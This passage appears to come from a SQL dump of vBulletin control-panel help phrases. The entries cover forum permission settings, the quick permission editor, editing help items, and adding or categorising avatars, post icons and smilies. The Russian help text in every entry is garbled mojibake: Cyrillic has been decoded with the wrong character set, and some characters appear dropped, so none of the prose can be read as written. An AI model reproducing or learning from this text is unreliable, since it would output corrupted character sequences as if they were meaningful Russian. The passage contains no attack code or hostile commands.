(22488, -1, 'forumpermission_edit_quickforum_canmove_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ñìîãóò ïåðåìåùà òü ñâîè òåìû èç ðà çäåëà â ðà çäåë, åñëè ó Ãèõ åñòü ïðà âà Ãà ýòî. Ãà ñòîÿòåëüÃî ðåêîìåÃäóåòñÿ îñòà âèòü ýòó îïöèþ âûêëþ÷åÃÃîé è îñòà âèòü ïðà âî ïåðåìåùà òü òåìû Ãà ìîäåðà òîðà ì è à äìèÃèñòðà òîðà ì.', 'vbulletin', '', 0, ''),
(22489, -1, 'forumpermission_edit_quickforum_canmove_title', 'cphelptext', 'Ìîãóò ïåðåìåùà òü ñâîè òåìû â äðóãèå ðà çäåëû', 'vbulletin', '', 0, ''),
(22490, -1, 'forumpermission_edit_quickforum_canopenclose_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ñìîãóò çà êðûâà òü è çà Ãîâî îòêðûâà òü òåìû, êîòîðûå îÃè Ãà ÷à ëè. Ãà ñòîÿòåëüÃî ðåêîìåÃäóåòñÿ âûêëþ÷èòü ýòó îïöèþ, òà ê êà ê åñëè ìîäåðà òîð çà êðîåò å¸, òî ïîëüçîâà òåëè ñìîãóò îòêðûòü å¸ ñÃîâà .', 'vbulletin', '', 0, ''),
(22491, -1, 'forumpermission_edit_quickforum_canopenclose_title', 'cphelptext', 'Ìîãóò îòêðûâà òü/çà êðûâà òü ñâîè òåìû', 'vbulletin', '', 0, ''),
(22492, -1, 'forumpermission_edit_quickforum_candeletethread_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ñìîãóò óäà ëÿòü òåìû, êîòîðûå îÃè Ãà ÷à ëè ñ ïîìîùüþ óäà ëåÃèÿ ïåðâîãî ñîîáùåÃèÿ òåìû.', 'vbulletin', '', 0, ''),
(22493, -1, 'forumpermission_edit_quickforum_candeletethread_title', 'cphelptext', 'Ìîãóò óäà ëÿòü ñâîè òåìû', 'vbulletin', '', 0, ''),
(22494, -1, 'forumpermission_edit_quickforum_canpostpoll_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ñìîãóò ñîçäà âà òü ãîëîñîâà Ãèÿ â ñîçäà ÃÃûõ èìè òåìà õ.', 'vbulletin', '', 0, ''),
(22495, -1, 'forumpermission_edit_quickforum_canpostpoll_title', 'cphelptext', 'Ìîãóò ñîçäà âà òü ãîëîñîâà Ãèÿ', 'vbulletin', '', 0, ''),
(22496, -1, 'forumpermission_edit_quickforum_canvote_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ñìîãóò ïðèÃèìà òü ó÷à ñòèå â ãîëîñîâà Ãèÿõ ýòîãî ðà çäåëà .', 'vbulletin', '', 0, ''),
(22497, -1, 'forumpermission_edit_quickforum_canvote_title', 'cphelptext', 'Ìîãóò ãîëîñîâà òü', 'vbulletin', '', 0, ''),
(22498, -1, 'forumpermission_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå Ãà õîäèòñÿ ñïèñîê âñåõ âà øèõ ðà çäåëîâ. Ãîä êà æäûì ðà çäåëîì Ãà õîäèòñÿ ñïèñîê âñåõ âà øèõ ãðóïï ïîëüçîâà òåëåé. \r\n\r\nÖâåò êà æäîé ãðóïïû ïîëüçîâà òåëåé ÿâëÿåòñÿ óêà çà òåëåì. Åñëè îà áåëûé, òî èñïîëüçóþòñÿ îáû÷Ãûå Ãà ñòðîéêè äëÿ ïðà â ãðóïïû ïîëüçîâà òåëåé. Åñëè ãðóïïà ïîëüçîâà òåëåé êðà ñÃà ÿ, òî â ýòîì ðà çäåëå èñïîëüçóþòñÿ èçìåÃÃ¥ÃÃûå Ãà ñòðîéêè. Åñëè îÃà æåëòà ÿ, òî èñïîëüçóþòñÿ Ãà ñòðîéêè, Ãà ñëåäóåìûå îò ðîäèòåëüñêîãî ðà çäåëà . Åñëè âû èñïîëüçóåòå Internet Explorer 4+ èëè Netscape 6+, òî êðóæåê ïåðåä êà æäûì Ãà çâà Ãèåì ãðóïïû òà êæå ÿâëÿåòñÿ óêà çà òåëåì. Ãîëûé êðóæîê îçÃà ÷à åò, ÷òî ãðóïïà ïîëüçîâà òåëåé ÃÃ¥ ìîæåò ïðîñìà òðèâà òü ðà çäåë, ñîîòâåòñòâåÃÃî ãðóïïà ìîæåò ïðîñìà òðèâà òü ðà çäåë, åñëè êðóæîê çà ïîëÃÃ¥Ã. \r\n\r\nÄëÿ ðåäà êòèðîâà Ãèÿ ïðà â êà êèõ-ëèáî ãðóïï èëè äëÿ âîçðà ùåÃèÿ èõ îáû÷Ãûõ ïðà â, Ãà æìèòå \"Ãåäà êòèðîâà òü\" ðÿäîì ñ ÃóæÃîé ãðóïïîé ïîä ÃóæÃûì ðà çäåëîì. \r\n\r\nÄóáëèðîâà Ãèå ïðà â, äîñòóïÃûé ïî ññûëêå Ãà âåðõó ñòðà Ãèöû, ïîçâîëÿåò âà ì áûñòðî äóáëèðîâà òü ñóùåñòâóþùèå Ãà ñòðîéêè ïðà â ìåæäó ãðóïï ïîëüçîâà òåëåé èëè ìåæäó ðà çäåëà ìè. (Ñì. Èñïîëüçîâà Ãèå äóáëèðîâà Ãèÿ ïðà â ) \r\n\r\nÂû òà êæå ìîæåòå îòñþäà ïîëó÷èòü äîñòóï ê Ãûñòðîìó ðåäà êòîðó. Ãûñòðûé ðåäà êòîð ïîçâîëèò âà ì áûñòðî âîññòà Ãîâèòü îáû÷Ãûå ïðà âà . (Ñì. Èñïîëüçîâà Ãèå áûñòðîãî ðåäà êòîðà ) \r\n\r\nÃîñëåäÃÿÿ ññûëêà Ãà âåðõó - Ãûñòðà ÿ Ãà ñòðîéêà ðà çäåëîâ. Ñ ïîìîùüþ Ãå¸ âû ìîæåòå ïðèìåÃèòü ïðà âà ê ìÃîæåñòâó ãðóïï ïîëüçîâà òåëåé óêà çà ÃÃîãî ðà çäåëà . (Ñì. Èñïîëüçîâà Ãèå áûñòðîé Ãà ñòðîéêè ðà çäåëîâ )', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(22499, -1, 'forumpermission_modify_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå ïðà â Ãà ôîðóìå', 'vbulletin', '', 0, ''),
(22500, -1, 'forumpermission_quickedit_text', 'cphelptext', 'Ãèæå Ãà õîäèòñÿ ñïèñîê âñåõ èçìåÃÃ¥ÃÃûõ ïðà â ðà çäåëîâ. Äëÿ âîññòà ÃîâëåÃèÿ îáû÷Ãûõ ïðà â ïðîñòî îòìåòüòå ÃóæÃûå ñòðî÷êè ñëåâà è Ãà æìèòå êÃîïêó \"Óäà ëèòü âûáðà ÃÃûå ïðà âà \" ñÃèçó. Äëÿ ðåäà êòèðîâà Ãèÿ òåêóùèõ Ãà ñòðîåê ïðîñòî Ãà æìèòå Ãà ññûëêó \"Ãåäà êòèðîâà òü\" ñïðà âà .', 'vbulletin', '', 0, ''),
(22501, -1, 'forumpermission_quickedit_title', 'cphelptext', 'Ãûñòðîå Ãà çÃà ÷åÃèå ïðà â', 'vbulletin', '', 0, ''),
(22502, -1, 'forumpermission_quickeditor_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå áûñòðî âîññòà Ãîâèòü îáû÷Ãûå ïðà âà ñ ïîìîùüþ îòìåòêè ÃóæÃûõ ðà çäåëîâ è Ãà æà òèåì Ãà \"Óäà ëèòü âûáðà ÃÃûå ïðà âà \". Âû òà êæå ìîæåòå ðåäà êòèðîâà òü òåêóùóþ Ãà ñòðîéêó ïðà â ó êîìáèÃà öèè ÃóæÃîãî ðà çäåëà è ãðóïïû ïîëüçîâà òåëåé, Ãà æà â Ãà ññûëêó \"Ãåäà êòèðîâà òü\".', 'vbulletin', '', 0, ''),
(22503, -1, 'forumpermission_quickeditor_title', 'cphelptext', 'Èñïîëüçîâà Ãèå áûñòðîãî ðåäà êòîðà ', 'vbulletin', '', 0, ''),
(22504, -1, 'forumpermission_quickforum_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ñìîæåòå áûñòðî óñòà Ãîâèòü ïðîñòåéøèå ïðà âà ê ìÃîæåñòâó ðà çäåëîâ è ãðóïï îäÃîâðåìåÃÃî. ÃÃ¥ âñå äîñòóïÃûå ïðà âà îòîáðà æà þòñÿ Ãà ýòîé ñòðà Ãèöå, Ãî îÃè îõâà òûâà þò âñå îñÃîâÃûå ôóÃêöèè, òà êèå êà ê ïðîñìîòð, îñòà âëåÃèå ñîîáùåÃèé è ñêà ÷èâà Ãèå âëîæåÃèé. \r\n\r\nÄëÿ Ãà ÷à ëà âûáåðèòå ðà çäåë ê êîòîðîìó äîëæÃû ïðèìåÃÿòüñÿ ïðà âà . ÃîìÃèòå, ÷òî â Ãåãî áóäóò âêëþ÷åÃû òà êæå è âñå ïîäðà çäåëû, åñëè â Ãèõ ÃÃ¥ óñòà ÃîâëåÃû äðóãèå Ãà ñòðîéêè ïðà â. Ñóùåñòâóþùèå ïðà âà äëÿ âûáðà ÃÃûõ ðà çäåëîâ áóäóò ïåðåçà ïèñà Ãû. \r\n\r\nÇà òåì âûáåðèòå êà êèì ãðóïïà ì ïîëüçîâà òåëåé ñëåäóåò ïåðåçà ïèñà òü ýòè ïðà âà . Âû ìîæåòå âûáðà òü ëþáîå êîëè÷åñòâî ãðóïï. \r\n\r\nÈ Ãà êîÃåö, âûáåðèòå òðåáóåìûå ïðà âà . Âû ìîæåòå èñïîëüçîâà òü êÃîïêè \"Âñå äà \" èëè \"Âñå Ãåò\" äëÿ áûñòðîãî èçìåÃÃ¥Ãèÿ âñåõ ïåðåêëþ÷à òåëåé. Ãà æìèòå \"Ñîõðà Ãèòü\" èçìåÃÃ¥Ãèÿ äëÿ ïðèìåÃÃ¥Ãèÿ Ãîâûõ ïðà â.', 'vbulletin', '', 0, ''),
(22505, -1, 'forumpermission_quickforum_title', 'cphelptext', 'Èñïîëüçîâà Ãèå áûñòðîé Ãà ñòðîéêè ðà çäåëîâ', 'vbulletin', '', 0, ''),
(22506, -1, 'forumpermission_quickforum_forumid_text', 'cphelptext', 'Âûáåðèòå ðà çäåë, ê êîòîðîì âû æåëà åòå ïðèìåÃèòü ýòè ïðà âà . ÃîìÃèòå, ÷òî ïðà âà Ãà ñëåäóþòñÿ ïîäðà çäåëà ìè, ïîýòîìó åñëè âû æåëà åòå, ÷òîáû ïðà âà ïîäðà çäåëîâ îòëè÷à ëèñü, òî âà ì ñëåäóåò èçìåÃèòü èõ îòäåëüÃî.', 'vbulletin', '', 0, ''),
(22507, -1, 'forumpermission_quickforum_forumid_title', 'cphelptext', 'ÃðèìåÃèòü ïðà âà ê ðà çäåëó', 'vbulletin', '', 0, ''),
(22508, -1, 'forumpermission_quickforum_usergrouplist_text', 'cphelptext', 'Âûáåðèòå âñå ãðóïïû ïîëüçîâà òåëåé, ê êîòîðûì âû æåëà åòå ïðèìåÃèòü ýòè ïðà âà â óêà çà ÃÃîì ðà çäåëå. Âñå ïðåäûäóùèå Ãà ñòðîéêè ïðà â äëÿ âûáðà ÃÃûõ ãðóïï áóäóò ïåðåçà ïèñà Ãû ïðà âà ìè, óêà çà ÃÃûìè Ãèæå.', 'vbulletin', '', 0, ''),
(22509, -1, 'forumpermission_quickforum_usergrouplist_title', 'cphelptext', 'ÃðèìåÃèòü ïðà âà ê ãðóïïå ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22510, -1, 'help_edit_action_text', 'cphelptext', 'Ãòî òåêóùåå äåéñòâèå, ê êîòîðîìó âû äîáà âëÿåòå ïîìîùü. Ãðèìåðû: add (äîáà âëåÃèå), edit (ðåäà êòèðîâà Ãèå), modify (èçìåÃÃ¥Ãèå). Âû ìîæåòå óçÃà òü òåêóùåå äåéñòâèå ñ ïîìîùüþ ïðîñìîòðà ôîðóìîâ â ðåæèìå îòëà äêè è èçó÷åÃèåì ñòà òóñÃîé ïà Ãåëè îáîçðåâà òåëÿ. Òà ì áóäåò Ãà ïèñà Ãî $_REQUEST[do]=\'XXXX\', ãäå XXXX - äåéñòâèå.', 'vbulletin', '', 0, ''),
(22511, -1, 'help_edit_action_title', 'cphelptext', 'Äåéñòâèå', 'vbulletin', '', 0, ''),
(22512, -1, 'help_edit_displayorder_text', 'cphelptext', 'Ãòî ïîëå ïîçâîëèò âà ì îòñîðòèðîâà òü ìÃîãîêðà òÃî ïîâòîðÿþùèåñÿ çà ïèñè ïîìîùè â ëîãè÷åñêîì ïîðÿäêå.', 'vbulletin', '', 0, ''),
(22513, -1, 'help_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(22514, -1, 'help_edit_optionname_text', 'cphelptext', 'Ãòî ññûëêà Ãà èÃäèâèäóà ëüÃûé ýëåìåÃò Ãà ñòðà Ãèöå. Âû ìîæåòå âûáðà òü åãî èç ýëåìåÃòîâ ââîäà . Èìÿ îïöèè áóäåò îòîáðà æà òüñÿ â tooltip è îòîáðà æà òüñÿ êà ê name=\"XXXXXX\", ãäå XXXXXX - Ãà çâà Ãèå ýëåìåÃòà ââîäà .', 'vbulletin', '', 0, ''),
(22515, -1, 'help_edit_optionname_title', 'cphelptext', 'Îïöèÿ', 'vbulletin', '', 0, ''),
(22516, -1, 'help_edit_product_text', 'cphelptext', 'Èñïîëüçóéòå ýòî ïîëå, ÷òîáû çà êðåïèòü äà ÃÃûé ïóÃêò ïîìîùè à äìèÃèñòðà òîðó çà êîÃêðåòÃûì ïðîäóêòîì èëè ìîäóëåì.', 'vbulletin', 'zCarot', 1154003373, '3.6.0'),
(22517, -1, 'help_edit_product_title', 'cphelptext', 'Ãðîäóêò', 'vbulletin', 'zCarot', 1154003373, '3.6.0'),
(22518, -1, 'help_edit_script_text', 'cphelptext', 'Ãòî èìÿ ñêðèïòà , ê êîòîðîìó âû æåëà åòå äîáà âèòü ïîìîùü. Èñïîëüçóåòå èìÿ ñêðèïòà áåç ðà ñøèðåÃèÿ, ò.Ã¥. forum âìåñòî forum.php.', 'vbulletin', '', 0, ''),
(22519, -1, 'help_edit_script_title', 'cphelptext', 'Ñêðèïò', 'vbulletin', '', 0, ''),
(22520, -1, 'help_edit_text_text', 'cphelptext', 'Ãòî òî ìåñòî, ãäå âû ìîæåòå ââåñòè òåêñò ïîìîùè. Åñëè âà ì ÃóæÃî áîëüøå ìåñòà , òî Ãà æìèòå êÃîïêó \"Ãîëüøîå îêÃî ðåäà êòèðîâà Ãèÿ\" äëÿ îòêðûòèÿ äîïîëÃèòåëüÃîãî îêÃà .', 'vbulletin', '', 0, ''),
(22521, -1, 'help_edit_text_title', 'cphelptext', 'Òåêñò', 'vbulletin', '', 0, ''),
(22522, -1, 'help_edit_title_text', 'cphelptext', 'Óêà æèòå çà ãîëîâîê äîáà âëÿåìîé èëè ðåäà êòèðóåìîé çà ïèñè ïîìîùè à äìèÃèñòðà òîðó.', 'vbulletin', 'zCarot', 1154003404, '3.6.0'),
(22523, -1, 'help_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', 'zCarot', 1154003404, '3.6.0'),
(22524, -1, 'help_edit_volatile_text', 'cphelptext', 'Åñëè \"Äà \", òî äà ÃÃà ÿ çà ïèñü ìîæåò áûòü îáÃîâëåÃà èëè çà ìåÃÃ¥Ãà ïðè ïîñëåäóþùèõ îáÃîâëåÃèÿõ ôîðóìà (÷åðåç upgrade.php).', 'vbulletin', 'zCarot', 1154003451, '3.6.0'),
(22525, -1, 'help_edit_volatile_title', 'cphelptext', 'Ãî óìîë÷à Ãèþ', 'vbulletin', 'zCarot', 1154003451, '3.6.0'),
(22526, -1, 'image_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÀâà òà ðû, èêîÃêè ñîîáùåÃèé è ñìà éëû \r\nÕðà ÃÃ¥Ãèå à âà òà ðîâ \r\n\r\nÀâà òà ðû, èêîÃêè ñîîáùåÃèé è ñìà éëû: \r\nÎäÃà è òà æå ñèñòåìà èñïîëüçóåòñÿ äëÿ óïðà âëåÃèÿ à âà òà ðà ìè, èêîÃêà ìè ñîîáùåÃèé è ñìà éëà ìè. Ñïðà âî÷Ãûå ñòà òüè â ýòîì ðà çäåëå ïðèìåÃèìû ê óïðà âëåÃèþ à âà òà ðà ìè, óïðà âëåÃèþ èêîÃêà ìè ñîîáùåÃèé è óïðà âëåÃèþ ñìà éëà ìè. Àâà òà ðû, èêîÃêè ñîîáùåÃèé è ñìà éëû â ýòîì ðà çäåëå ïîìîùè Ãà çûâà þòñÿ îáùèì ñëîâîì \"èçîáðà æåÃèÿ\". \r\n\r\nÑèñòåìà èçîáðà æåÃèé ôîðóìà èñïîëüçóåòñÿ äëÿ óïðà âëåÃèÿ à âà òà ðà ìè, èêîÃêà ìè ñîîáùåÃèé è ñìà éëà ìè. Ãòè èçîáðà æåÃèÿ ìîãóò áûòü ðà ñïðåäåëåÃû ïî êà òåãîðèÿì, è äîñòóï ê Ãèì ìîæåò áûòü îãðà Ãè÷åà ïî êîëè÷åñòâó ñîîáùåÃèé è ãðóïïå ïîëüçîâà òåëåé. Îãðà Ãè÷åÃèå ïî ãðóïïå ïîëüçîâà òåëåé óñòà Ãà âëèâà åòñÿ äëÿ êà òåãîðèè, à êîëè÷åñòâî ñîîáùåÃèé äëÿ îòäåëüÃûõ èçîáðà æåÃèé. Äëÿ äîñòóïà ê êà òåãîðèè èçîáðà æåÃèé, ïîëüçîâà òåëü äîëæåà áûòü ÷ëåÃîì êà ê ìèÃèìóì îäÃîé ãðóïïû (ÃÃ¥ âà æÃî, äëÿ Ãåãî ýòî îñÃîâÃà ÿ èëè äîïîëÃèòåëüÃà ÿ ãðóïïà ), áîëåå ïîäðîáÃî î ãðóïïà õ ïîëüçîâà òåëåé ìîæÃî óçÃà òü çäåñü . ', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22527, -1, 'image_title', 'cphelptext', 'Îá à âà òà ðà õ, èêîÃêà õ ñîîáùåÃèé è ñìà éëà õ', 'vbulletin', '', 0, ''),
(22528, -1, 'image_add_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì äîáà âèòü îäÃó èëè Ãåñêîëüêî èçîáðà æåÃèé çà ðà ç. Ãòè èçîáðà æåÃèÿ äîëæÃû óæå Ãà õîäèòñÿ Ãà ñåðâåðå, çà ãðóæåÃÃûå ÷åðåç FTP èëè êà êèì-ëèáî äðóãèì ñïîñîáîì. \r\n\r\nÂû ìîæåòå äîáà âëÿòü êà ê îäÃó òà ê è Ãåñêîëüêî èçîáðà æåÃèé çà ðà ç.', 'vbulletin', '', 0, ''),
(22529, -1, 'image_add_title', 'cphelptext', 'Äîáà âèòü Ãîâûé à âà òà ð/èêîÃêó ñîîáùåÃèé/ñìà éë', 'vbulletin', '', 0, ''),
(22530, -1, 'image_add_imagespath_text', 'cphelptext', 'Ãòî ïóòü ê èçîáðà æåÃèÿì, êîòîðûå âû æåëà åòå äîáà âèòü. Îà äîëæåà áûòü îòÃîñèòåëüÃûì îò ãëà âÃîé äèðåêòîðèè âà øåãî ôîðóìà . Ãà ïðèìåð, âà øà ñòðóêòóðà êà òà ëîãîâ âûãëÿäèò âîò òà ê: \r\n- forum \r\n-- images \r\n--- avatars \r\n--- icons \r\n--- smilies \r\nè âû çà ãðóæà åòå ñìà éë, òî äîëæÃû ââåñòè \r\nimages/smilies \r\nÃÃ¥ óêà çûâà åòå çäåñü èìÿ ôà éëà è ÃÃ¥ äîáà âëÿéòå ëèøÃèõ ñëåøåé.', 'vbulletin', '', 0, ''),
(22531, -1, 'image_add_imagespath_title', 'cphelptext', 'Ãóòü ê èçîáðà æåÃèÿì', 'vbulletin', '', 0, ''),
(22532, -1, 'image_add_perpage_text', 'cphelptext', 'Ãòî êîëè÷åñòâî èçîáðà æåÃèé, êîòîðûå áóäóò îòîáðà æà òüñÿ Ãà êà æäîé ñòðà Ãèöå ïðè èõ äîáà âëåÃèè.', 'vbulletin', '', 0, ''),
(22533, -1, 'image_add_perpage_title', 'cphelptext', 'Èçîáðà æåÃèé Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(22534, -1, 'image_add_edit_upload_title_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå èçîáðà æåÃèÿ, êîòîðîå áóäåò îòîáðà æà òüñÿ âìåñòå ñ Ãèì (çà èñêëþ÷åÃèåì ñìà éëîâ).', 'vbulletin', '', 0, ''),
(22535, -1, 'image_add_edit_upload_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(22536, -1, 'image_add_edit_upload_minimumposts_text', 'cphelptext', 'Ãòî ìèÃèìà ëüÃî Ãåîáõîäèìîå êîëè÷åñòâî ñîîáùåÃèé, êîòîðîå äîëæåà îñòà âèòü ïîëüçîâà òåëü, äî òîãî êà ê èñïîëüçîâà òü ýòîò à âà òà ð.Ãòîò ïà ðà ìåòð ïðèìåÃèì òîëüêî ê à âà òà ðà ì ', 'vbulletin', '', 0, ''),
(22537, -1, 'image_add_edit_upload_minimumposts_title', 'cphelptext', 'ÌèÃèìóì ñîîáùåÃèé äëÿ èñïîëüçîâà Ãèÿ ýòîãî à âà òà ðà ', 'vbulletin', '', 0, ''),
(22538, -1, 'image_add_edit_upload_smilietext_text', 'cphelptext', 'Ãòî òîò òåêñò, êîòîðûé ïðè ââîäå ïîëüçîâà òåëåì áóäåò ïðåîáðà çîâà à â ñìà éë. Ãà ïðèìåð :) èëè :( - ïîìÃèòå, ÷òî ýòî ðåãèñòðîçà âèñèìûé òåêñò. :P è :p ÃÃ¥ îäÃî è òîæå.Ãòîò ïà ðà ìåòð ïðèìåÃèì òîëüêî ê ñìà éëà ì ', 'vbulletin', '', 0, ''),
(22539, -1, 'image_add_edit_upload_smilietext_title', 'cphelptext', 'Òåêñò äëÿ çà ìåÃû', 'vbulletin', '', 0, ''),
(22540, -1, 'image_add_edit_upload_path_text', 'cphelptext', 'Ãòî ïóòü ê èçîáðà æåÃèþ. Îà äîëæåà áûòü îòÃîñèòåëüÃûì îò ãëà âÃîé äèðåêòîðèè âà øåãî ôîðóìà . Ãà ïðèìåð, âà øà ñòðóêòóðà êà òà ëîãîâ âûãëÿäèò âîò òà ê: \r\n- forum \r\n-- images \r\n--- avatars \r\n--- icons \r\n--- smilies \r\n \r\nÂà ø ñìà éë Ãà çûâà åòñÿ tongue.gif, è îà ðà ñïîëîæåà â äèðåêòîðèè smilies, òî âû äîëæÃû ââåñòè: \r\nimages/smilies/tongue.gif', 'vbulletin', '', 0, ''),
(22541, -1, 'image_add_edit_upload_path_title', 'cphelptext', 'Ãóòü', 'vbulletin', '', 0, ''),
(22542, -1, 'image_add_edit_upload_imagecategoryid_text', 'cphelptext', 'Ãòî êà òåãîðèÿ, â êîòîðóþ áóäåò äîáà âëåÃî èçîáðà æåÃèå. Ÿ ìîæÃî áóäåò èçìåÃèòü ïîçæå.', 'vbulletin', '', 0, ''),
(22543, -1, 'image_add_edit_upload_imagecategoryid_title', 'cphelptext', 'Êà òåãîðèÿ èçîáðà æåÃèé', 'vbulletin', '', 0, ''),
(22544, -1, 'image_add_edit_upload_displayorder_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ïîðÿäîê, â êîòîðîì áóäóò îòîáðà æà òüñÿ èçîáðà æåÃèÿ. Åãî ìîæÃî áóäåò ïîìåÃÿòü ïîçæå.', 'vbulletin', '', 0, ''),
(22545, -1, 'image_add_edit_upload_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(22546, -1, 'image_addcategory_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âèòü êà òåãîðèþ èçîáðà æåÃèé. Èçîáðà æåÃèÿ îòîáðà æà þòñÿ ïî êà òåãîðèÿì, è âû ìîæåòå óñòà Ãîâèòü ïðà âà Ãà èõ èñïîëüçîâà Ãèå (êðîìå ñìà éëîâ).', 'vbulletin', '', 0, ''),
(22547, -1, 'image_addcategory_title', 'cphelptext', 'Äîáà âèòü Ãîâóþ êà òåãîðèþ à âà òà ðîâ/èêîÃîê ñîîáùåÃèé/ñìà éëîâ', 'vbulletin', '', 0, ''),
(22548, -1, 'image_addcategory_editcategory_title_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå êà òåãîðèè. ÃŽÃî îòîáðà æà åòñÿ âìåñòå ñ èçîáðà æåÃèÿìè ýòîé êà òåãîðèè.', 'vbulletin', '', 0, ''),
(22549, -1, 'image_addcategory_editcategory_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(22550, -1, 'image_addcategory_editcategory_displayorder_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ïîðÿäîê, â êîòîðîì áóäóò îòîáðà æà òüñÿ êà òåãîðèè.', 'vbulletin', '', 0, ''),
(22551, -1, 'image_addcategory_editcategory_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(22552, -1, 'image_edit_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ðåäà êòèðîâà òü Ãà ñòðîéêè äëÿ ýòîìó èçîáðà æåÃèþ. Åñëè ó âà ñ åñòü âîïðîñû ïî ñïåöèôè÷åñêèì Ãà ñòðîéêà ì, òî ñìîòðèòå ñîîòâåòñòâóþùèå òåìû ïîìîùè.', 'vbulletin', '', 0, ''),
(22553, -1, 'image_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå à âà òà ðà /èêîÃêè ñîîáùåÃèÿ/ñìà éëà ', 'vbulletin', '', 0, ''),
(22554, -1, 'image_editcategory_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ðåäà êòèðîâà òü ñóùåñòâóþùèå êà òåãîðèè èçîáðà æåÃèé. Èçîáðà æåÃèÿ îòîáðà æà þòñÿ ïî êà òåãîðèÿì, è âû ìîæåòå óñòà Ãîâèòü ïðà âà Ãà èñïîëüçîâà Ãèå îïðåäåëåÃÃîé êà òåãîðèè (êðîìå ñìà éëîâ).', 'vbulletin', '', 0, ''),
(22555, -1, 'image_editcategory_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå êà òåãîðèè à âà òà ðîâ/èêîÃîê ñîîáùåÃèé/ñìà éëîâ', 'vbulletin', '', 0, ''),
(22556, -1, 'image_editpermissions_text', 'cphelptext', 'Êà òåãîðèè èçîáðà æåÃèé ìîãóò áûòü ÃåäîñòóïÃû äëÿ îïðåäåëåÃÃûõ ãðóïï ïîëüçîâà òåëåé. Ãðîñòî âûáåðèòå \"Äà \" äëÿ ãðóïï, êîòîðûì âû æåëà åòå äà òü äîñòóï, è \"Ãåò\" äëÿ òåõ, êîìó æåëà åòå çà ïðåòèòü.', 'vbulletin', '', 0, ''),
(22557, -1, 'image_editpermissions_title', 'cphelptext', 'Ãðà âà à âà òà ðîâ/èêîÃîê ñîîáùåÃèé/ñìà éëîâ', 'vbulletin', '', 0, ''),
(22558, -1, 'image_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå óïðà âëÿòü ñâîèìè èçîáðà æåÃèÿìè. Èçîáðà æåÃèÿ ìîãóò áûòü ðà ñïðåäåëåÃû ïî êà òåãîðèÿì, è äîñòóï ê Ãèì ìîæåò áûòü îãðà Ãè÷åà Ãà óðîâÃÃ¥ ãðóïïû è ïî êîëè÷åñòâó ñîîáùåÃèé. Îãðà Ãè÷åÃèÿ ïî ãðóïïå ïîëüçîâà òåëåé óñòà Ãà âëèâà þòñÿ äëÿ âñåé êà òåãîðèè, à îãðà Ãè÷åÃèÿ ïî êîëè÷åñòâó ñîîáùåÃèé - äëÿ îòäåëüÃûõ èçîáðà æåÃèé. \r\n\r\n×òîáû ñîçäà òü Ãîâóþ êà òåãîðèþ èçîáðà æåÃèé, âû ìîæåòå Ãà æà òü Ãà ññûëêó [Äîáà âèòü Ãîâóþ êà òåãîðèþ] âÃèçó ñòðà Ãèöû. Ãà æìèòå Ãà ññûëêó [Ãîêà çà òü âñå], ÷òîáû óâèäåòü âñå èçîáðà æåÃèÿ âñåõ êà òåãîðèé. \r\n\r\nÃèæå Ãà õîäèòñÿ ñïèñîê âñåõ âà øèõ êà òåãîðèé èçîáðà æåÃèé. ÊîëîÃêà \"Ãà çâà Ãèå\" îòîáðà æà åò Ãà çâà Ãèå êà æäîé êà òåãîðèè. Âû ìîæåòå Ãà æà òü Ãà Ãà çâà Ãèå êà òåãîðèè, ÷òîáû óâèäåòü èçîáðà æåÃèÿ, ïðèÃà äëåæà ùèå åé. \r\n\r\nÊîëîÃêà \"Ñîäåðæèò\" îòîáðà æà åò êîëè÷åñòâî èçîáðà æåÃèé, ïðèÃà äëåæà ùèõ ýòîé êà òåãîðèè. \r\n\r\nÊîëîÃêà \"Ãîðÿäîê îòîáðà æåÃèÿ\" îòîáðà æà åò ïîðÿäîê îòîáðà æåÃèÿ èçîáðà æåÃèé â êà æäîé êà òåãîðèè. Ãîðÿäîê îòîáðà æåÃèÿ èñïîëüçóåòñÿ äëÿ ñîðòèðîâêè ñïèñêà èçîáðà æåÃèé êà ê â óïðà âëåÃèè èçîáðà æåÃèÿìè, òà ê è Ãà ôîðóìå. Ãà ýòîé ñòðà Ãèöå âû ìîæåòå èçìåÃèòü ïîðÿäîê îòîáðà æåÃèÿ ñ ïîìîùüþ èçìåÃÃ¥Ãèÿ çÃà ÷åÃèé ýòîé êîëîÃêè è Ãà æà òèåì 